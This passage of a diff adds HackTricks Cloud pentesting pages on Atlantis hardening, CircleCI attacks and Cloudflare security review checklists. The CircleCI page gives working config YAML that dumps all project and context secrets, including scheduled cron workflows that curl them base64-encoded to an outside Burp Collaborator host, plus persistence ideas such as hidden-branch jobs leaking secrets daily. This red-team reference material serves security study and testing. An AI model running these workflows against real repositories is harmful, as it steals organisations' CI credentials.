+
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
+
+#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
+
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
+
+#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
+
+Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
+
+* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
+* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
+
+If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
+
+To prevent this, you could:
+
+1. Bake providers into the Atlantis image or host and deny egress in production.
+2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
+3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
+
+#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
+
+Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+
+If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
+
+#### Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
+
+Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
+
+#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
+
+If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
+
+#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
+
+It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
+
+You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
+
+### References
+
+* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
+* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/circleci-security.md b/pentesting-ci-cd/circleci-security.md
new file mode 100644
index 0000000000..e92fede51f
--- /dev/null
+++ b/pentesting-ci-cd/circleci-security.md
@@ -0,0 +1,286 @@
+# CircleCI Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Basic Information
+
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+
+### Permissions
+
+**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
+In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
+
+However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
+
+### Env Variables & Secrets
+
+According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
+
+#### Built-in env variables
+
+Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
+
+#### Clear text
+
+You can declare them in clear text inside a **command**:
+
+```yaml
+- run:
+    name: "set and echo"
+    command: |
+        SECRET="A secret"
+        echo $SECRET
+```
+
+You can declare them in clear text inside the **run environment**:
+
+```yaml
+- run:
+    name: "set and echo"
+    command: echo $SECRET
+    environment:
+        SECRET: A secret
+```
+
+You can declare them in clear text inside the **build-job environment**:
+
+```yaml
+jobs:
+    build-job:
+        docker:
+            - image: cimg/base:2020.01
+    environment:
+        SECRET: A secret
+```
+
+You can declare them in clear text inside the **environment of a container**:
+
+```yaml
+jobs:
+    build-job:
+        docker:
+            - image: cimg/base:2020.01
+                environment:
+                    SECRET: A secret
+```
+
+#### Project Secrets
+
+These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
+You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org\_name>/\<repo\_name>/environment-variables_
+
+![](<../.gitbook/assets/image (129).png>)
+
+{% hint style="danger" %}
+The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
+{% endhint %}
+
+#### Context Secrets
+
+These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
+
+![](<../.gitbook/assets/image (123).png>)
+
+{% hint style="success" %}
+However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
+This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
+{% endhint %}
+
+### Attacks
+
+#### Search Clear Text Secrets
+
+If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
+
+#### Secret Env Vars & Context enumeration
+
+Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org\_name>/contexts_.
+
+#### Exfiltrate Project secrets
+
+{% hint style="warning" %}
+In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
+{% endhint %}
+
+{% hint style="danger" %}
+The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
+{% endhint %}
+
+All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
+
+```yaml
+version: 2.1
+
+jobs:
+  exfil-env:
+    docker:
+      - image: cimg/base:stable
+    steps:
+      - checkout
+      - run:
+          name: "Exfil env"
+          command: "env | base64"
+
+workflows:
+  exfil-env-workflow:
+    jobs:
+      - exfil-env
+```
+
+If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
+
+```yaml
+version: 2.1
+
+jobs:
+  exfil-env:
+    docker:
+      - image: cimg/base:stable
+    steps:
+      - checkout
+      - run:
+          name: "Exfil env"
+          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+
+# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
+workflows:
+  exfil-env-workflow:
+    triggers:
+      - schedule:
+          cron: "* * * * *"
+          filters:
+            branches:
+              only:
+                - circleci-project-setup
+    jobs:
+      - exfil-env
+```
+
+#### Exfiltrate Context Secrets
+
+You need to **specify the context name** (this will also exfiltrate the project secrets):
+
+```yaml
+version: 2.1
+
+jobs:
+  exfil-env:
+    docker:
+      - image: cimg/base:stable
+    steps:
+      - checkout
+      - run:
+          name: "Exfil env"
+          command: "env | base64"
+
+workflows:
+  exfil-env-workflow:
+    jobs:
+      - exfil-env:
+          context: Test-Context
+```
+
+If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
+
+```yaml
+version: 2.1
+
+jobs:
+  exfil-env:
+    docker:
+      - image: cimg/base:stable
+    steps:
+      - checkout
+      - run:
+          name: "Exfil env"
+          command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+
+# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
+workflows:
+  exfil-env-workflow:
+    triggers:
+      - schedule:
+          cron: "* * * * *"
+          filters:
+            branches:
+              only:
+                - circleci-project-setup
+    jobs:
+      - exfil-env:
+          context: Test-Context
+```
+
+{% hint style="warning" %}
+Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
+{% endhint %}
+
+#### Escape to Cloud
+
+**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
+By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
+
+Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
+
+```yaml
+jobs:
+  exfil-env:
+    #docker:
+    #  - image: cimg/base:stable
+    machine:
+      image: ubuntu-2004:current
+```
+
+Or even a docker container with access to a remote docker service:
+
+```yaml
+jobs:
+  exfil-env:
+    docker:
+      - image: cimg/base:stable
+    steps:
+      - checkout
+      - setup_remote_docker:
+          version: 19.03.13
+```
+
+#### Persistence
+
+* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
+  * _https://app.circleci.com/settings/user/tokens_
+* It's possible to **create projects tokens** to access the project with the permissions given to the token.
+  * _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
+* It's possible to **add SSH keys** to the projects.
+  * _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
+* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
+  * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
+* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
+* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/cloudflare-security/README.md b/pentesting-ci-cd/cloudflare-security/README.md
new file mode 100644
index 0000000000..05741968d4
--- /dev/null
+++ b/pentesting-ci-cd/cloudflare-security/README.md
@@ -0,0 +1,163 @@
+# Cloudflare Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+
+<figure><img src="../../.gitbook/assets/image (117).png" alt=""><figcaption></figcaption></figure>
+
+## Websites
+
+Review each with:
+
+{% content-ref url="cloudflare-domains.md" %}
+[cloudflare-domains.md](cloudflare-domains.md)
+{% endcontent-ref %}
+
+### Domain Registration
+
+* [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
+
+Review each with:
+
+{% content-ref url="cloudflare-domains.md" %}
+[cloudflare-domains.md](cloudflare-domains.md)
+{% endcontent-ref %}
+
+## Analytics
+
+_I couldn't find anything to check for a config security review._
+
+## Pages
+
+On each Cloudflare's page:
+
+* [ ] Check for **sensitive information** in the **`Build log`**.
+* [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
+* [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
+* [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
+* [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
+* [ ] In the details of each page `/<page_id>/pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
+* [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
+
+## **Workers**
+
+On each Cloudflare's worker check:
+
+* [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
+* [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
+* [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
+  * Check for SSRFs returning the indicated page that you can control
+  * Check XSSs executing JS inside a svg image
+  * It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
+
+{% hint style="warning" %}
+Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
+{% endhint %}
+
+## R2
+
+On each R2 bucket check:
+
+* [ ] Configure **CORS Policy**.
+
+## Stream
+
+TODO
+
+## Images
+
+TODO
+
+## Security Center
+
+* [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
+  * [ ] Just **check this information** for security misconfigurations and interesting info
+
+## Turnstile
+
+TODO
+
+## **Zero Trust**
+
+{% content-ref url="cloudflare-zero-trust-network.md" %}
+[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md)
+{% endcontent-ref %}
+
+## Bulk Redirects
+
+{% hint style="info" %}
+Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
+{% endhint %}
+
+* [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
+* [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
+
+## Notifications
+
+* [ ] Check the **notifications.** These notifications are recommended for security:
+  * `Usage Based Billing`
+  * `HTTP DDoS Attack Alert`
+  * `Layer 3/4 DDoS Attack Alert`
+  * `Advanced HTTP DDoS Attack Alert`
+  * `Advanced Layer 3/4 DDoS Attack Alert`
+  * `Flow-based Monitoring: Volumetric Attack`
+  * `Route Leak Detection Alert`
+  * `Access mTLS Certificate Expiration Alert`
+  * `SSL for SaaS Custom Hostnames Alert`
+  * `Universal SSL Alert`
+  * `Script Monitor New Code Change Detection Alert`
+  * `Script Monitor New Domain Alert`
+  * `Script Monitor New Malicious Domain Alert`
+  * `Script Monitor New Malicious Script Alert`
+  * `Script Monitor New Malicious URL Alert`
+  * `Script Monitor New Scripts Alert`
+  * `Script Monitor New Script Exceeds Max URL Length Alert`
+  * `Advanced Security Events Alert`
+  * `Security Events Alert`
+* [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
+  * [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
+
+## Manage Account
+
+* [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
+* [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
+* [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
+  * Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
+* [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
+
+{% hint style="info" %}
+Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
+{% endhint %}
+
+## DDoS Investigation
+
+[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
new file mode 100644
index 0000000000..7eb00f0bac
--- /dev/null
+++ b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -0,0 +1,159 @@
+# Cloudflare Domains
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+
+<figure><img src="../../.gitbook/assets/image (101).png" alt=""><figcaption></figcaption></figure>
+
+### Overview
+
+* [ ] Get a feeling of **how much** are the services of the account **used**
+* [ ] Find also the **zone ID** and the **account ID**
+
+### Analytics
+
+* [ ] In **`Security`** check if there is any **Rate limiting**
+
+### DNS
+
+* [ ] Check **interesting** (sensitive?) data in DNS **records**
+* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
+* [ ] Check for web pages that **aren't** **proxied**
+* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
+* [ ] Check that **DNSSEC** is **enabled**
+* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
+  * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
+* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
+
+### **Email**
+
+TODO
+
+### Spectrum
+
+TODO
+
+### SSL/TLS
+
+#### **Overview**
+
+* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
+* [ ] The **SSL/TLS Recommender** should be enabled
+
+#### Edge Certificates
+
+* [ ] **Always Use HTTPS** should be **enabled**
+* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
+* [ ] **Minimum TLS Version should be 1.2**
+* [ ] **TLS 1.3 should be enabled**
+* [ ] **Automatic HTTPS Rewrites** should be **enabled**
+* [ ] **Certificate Transparency Monitoring** should be **enabled**
+
+### **Security**
+
+* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
+  * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
+* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
+* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
+* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
+* [ ] In the **`Settings`** section:
+  * [ ] Check that the **`Security Level`** is **medium** or greater
+  * [ ] Check that the **`Challenge Passage`** is 1 hour at max
+  * [ ] Check that the **`Browser Integrity Check`** is **enabled**
+  * [ ] Check that the **`Privacy Pass Support`** is **enabled**
+
+#### **CloudFlare DDoS Protection**
+
+* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
+* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
+  * If the attack is from a **verified bot**, at least **add a rate limit** to bots.
+  * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
+  * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
+  * Check if **Managed rules** could also help to prevent vulnerability exploitations.
+  * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
+* In DDoS you could **override some rules to make them more restrictive**.
+* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
+* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
+* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
+
+### Access
+
+{% content-ref url="cloudflare-zero-trust-network.md" %}
+[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md)
+{% endcontent-ref %}
+
+### Speed
+
+_I couldn't find any option related to security_
+
+### Caching
+
+* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
+
+### **Workers Routes**
+
+_You should have already checked_ [_cloudflare workers_](./#workers)
+
+### Rules
+
+TODO
+
+### Network
+
+* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
+* [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
+* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
+
+### **Traffic**
+
+TODO
+
+### Custom Pages
+
+* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
+
+### Apps
+
+TODO
+
+### Scrape Shield
+
+* [ ] Check **Email Address Obfuscation** is **enabled**
+* [ ] Check **Server-side Excludes** is **enabled**
+
+### **Zaraz**
+
+TODO
+
+### **Web3**
+
+TODO
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
new file mode 100644
index 0000000000..85b037522e
--- /dev/null
+++ b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
@@ -0,0 +1,87 @@
+# Cloudflare Zero Trust Network
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
